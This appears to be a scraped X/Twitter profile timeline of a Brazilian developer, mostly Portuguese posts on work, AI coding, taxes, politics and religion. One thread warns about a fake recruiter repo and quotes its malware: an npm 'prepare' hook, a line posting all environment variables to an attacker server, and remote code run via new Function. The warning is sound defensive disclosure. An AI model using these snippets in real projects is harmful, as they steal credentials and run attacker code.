@vedovelli74 Aqui agora e tudo em vm, to confiando nem em docker mais.
Português
Wouerner Brandão
2K posts
Wouerner Brandão
@wouerner
Relatos do meu trabalho para o mundo.
Brasilia Katılım Ekim 2009
254 Takip Edilen260 Takipçiler
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe.
Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar.
Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente.
🎯 Payload 1 — dispara no `npm install`
O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um:
`axios.post(url, { ...process.env })`
Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser.
A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
Português
Esse galera tem tempo para cada coisa, e conectar em prod e vraummmmm
madmorett, CTO da Monest@Morett_the_best
o que vcs usam para baixar dados do Aurora MySQL de Prod/Homolog pra Local de maneira anonimizada para ter um ambiente local mais fidedigno a prod? nada? resolvem só com seed?
Português
@leandronsp @Shinobu_uwu Então tudo bugado como sempre. Perfect
Português
eu acho mto triste que péssimos exemplos como esses que ele trouxe são o argumento dos doomers para invalidar uso de AI assisted coding.
aqui na empresa não é tolerado de forma alguma a entrega com bugs, tudo é feito com rigor como sempre foi antes de AI, e ainda assim entregamos com uso de AI.
triste, pq parece que o padrão da indústria é fazer de qq jeito, aí vc para um pouco e reflete que sempre foi assim, nada de novo sob o Sol 😅
Português
@lucas_montano @perssua Hahahhahahaha, como transformar uma coisa simples em algo incrivelmente mirabolante.
GIF
Português
Coletivista é um lixo mesmo.... União só com minha família.
zinho@zinhodev
Desenvolvedores de software tinham uma mina de ouro nas mãos Poderiam ter se unido e criado proteções para a carreira como os médicos fazem. Mas, na ilusão neoliberal, competiram, se venderam e leiloram tudo que produziam, até serem substituídos pelo software que eles criaram
Português
Wouerner Brandão retweetledi
Desenvolvedores de software tinham uma mina de ouro nas mãos
Poderiam ter se unido e criado proteções para a carreira como os médicos fazem. Mas, na ilusão neoliberal, competiram, se venderam e leiloram tudo que produziam, até serem substituídos pelo software que eles criaram
Português
@dlemesdev Faz assim, se tu gosta tanto de pagar imposto, paga os meus, mando onde o boleto...............
Português
Pra nao cair no papo de que se alguém ganha R$ 3.200 (CLT) ele custa 5k dado a entender que o que tem acima dos 3200 é imposto, olha o custo real.
Salário: R$ 3.200
Encargos (~R$ 1.100):
• INSS (~R$ 640) → vira aposentadoria/benefícios
• FGTS (~R$ 256) → é do trabalhador
• Outros impostos (~R$ 200) → não voltam direto
Provisões:
• 13º: ~R$ 340 → do trabalhador
• Férias + 1/3: ~R$ 455 → do trabalhador
Custo total: ~R$ 5.100
Parte “do trabalhador”: ~R$ 4.250
Impostos sem retorno direto: ~R$ 850
Português
@enrichthesoil O cara tava na reunião e não conseguiu defender as ideia, e veio encontrar apoio.... Fraco demais, eu não deixava...
Português
acabei de sair de uma reunião onde decidiram refatorar todo o sistema.
estou trabalhando em uma fintech com tecnologia de ponta, nodejs, mongodb, etc...
agora querem colocar tudo DELPHI pq viram um cara falando mal de tecnologia nova e elogiando legado.
já compramos 20 licenças da Embarcadero.
Português
A high-risk illegal tool called Tela Caixa Física + Jurídica Operadora (Mobile & Desktop) is being openly marketed for R$ 2,000 per month.
Advertised features include: • Selective data harvesting of individuals (Pessoa Física — PF) and legal entities (Pessoa Jurídica — PJ)
• CPF + CNPJ APIs
• Operator commands for sending QR Codes and numerous other remote controls
• Complete dashboard with real-time metrics, statistics, and separation between physical and legal persons
• Ability to enable/disable specific data collection (only PF, only PJ, or both)
• Full command control (return to start, switch account types, module updates, and all tokens)
This solution is explicitly designed for mass unauthorized collection of personal and corporate data, social engineering, and banking fraud, constituting serious violations of Brazil’s LGPD (General Data Protection Law), the Penal Code (fraud and electronic fraud), and the Internet Civil Rights Framework.
The ad highlights “limited spots” and includes a demonstration video.
#CyberAlert #BankFraud #TelaCaixa #CyberCrime #LGPD #DataProtection #ReportFraud #CyberSecurity @Caixa
Português
@danilocsts O segredo do realismo é o MoCap: humanos reais gravando cada passo pra tirar aquele ar de robô e dar um gingado de verdade pro jogo. É o puro suco do perfeccionismo!
Português
@kipperdev @samsantosb Complicado vc conhecer o produto justamente quando estão demitindo, vcs ver o que e pora....
Português
acabamos de reduzir o time da Pora de volta pra 3 pessoas (tínhamos + 2 PJs ajudando)
algumas tarefas simplesmente não podem ser paralelizadas nem delegadas no início
E uma coisa interessante é: comecei a ler o livro "Mítico Homem Mês" essa semana, e o autor já falava isso há 50 anos atrás.
Certas tarefas por conta da sua natureza não são completadas mais rapidamente se houver mais pessoas realizando elas.
Por exemplo: se 1 programador demora 9 dias pra fazer uma tarefa, 9 programadores demorariam 1 dia, certo?
Não necessariamente.
Apesar de parecer que quebrar um problema em 9 pedaços e distribuir vai ser mais rápido, na verdade adiciona outras complexidades no processo, como:
- Gerenciar a comunicação entre 9 pessoas
- Os códigos precisariam ser feitos de maneira 100% compatível - o que a gente sabe que não acontece ...
- Passagem de contexto de um para o outro também leva tempo
O mais doido é que isso parece não se aplicar só a tarefas de código, mas deixo essa discussão pra outro tweet.
Português
Wouerner Brandão retweetledi
Lembram quando eu disse que o PL da Misoginia era apenas desculpa para calar mulheres?
Está comprovado.
Acabo de receber do @x de @elonmusk um pedido de censura feito por @ErikakHilton e levado adiante pela @AdvocaciaGeral
Se juntaram para pedir para eu deletar um post.
Amanhã farei a LIVE da censura no meu canal.
Pela primeira vez, em 30 anos de jornalismo, terei de apagar o que escrevi a mando oficial de um governo.
Pior: dizem fazer isso para combater misoginia.
Acompanhem em youtube.com/MadeleineLacsko
Português
@lincolixavier @rodrigocrf0 Só existe um Deus o resto e imitação
Português
@rodrigocrf0 Qual Deus?
Só o que os cristãos acreditam?
Porque tem alguns outros bilhões de humanos que acreditam em outros deuses.
Português
Na boa, como existem pessoas que não acreditam em Deus?
- Sol na distância ideal
- Gravidade adequada
- Água líquida
- Campo magnético
- Atmosfera protetora
- Presença da Lua
- Inclinação do eixo da Terra
- Júpiter protegendo a Terra
Tudo perfeito demais pra ter surgido do nada
diesgu@diesgu
o por do sol visto do espaço
Português
Tive um estalo hoje pela manhã, eu não sinto diferença entre claudin code, gmini no console e o augmentcode (empresa que paga) no fim eu troco entre eles de forma tranquila. E como dizem, um graveto na mão do mestre e um arma, enquanto uma espada na mão do novato e um graveto
Português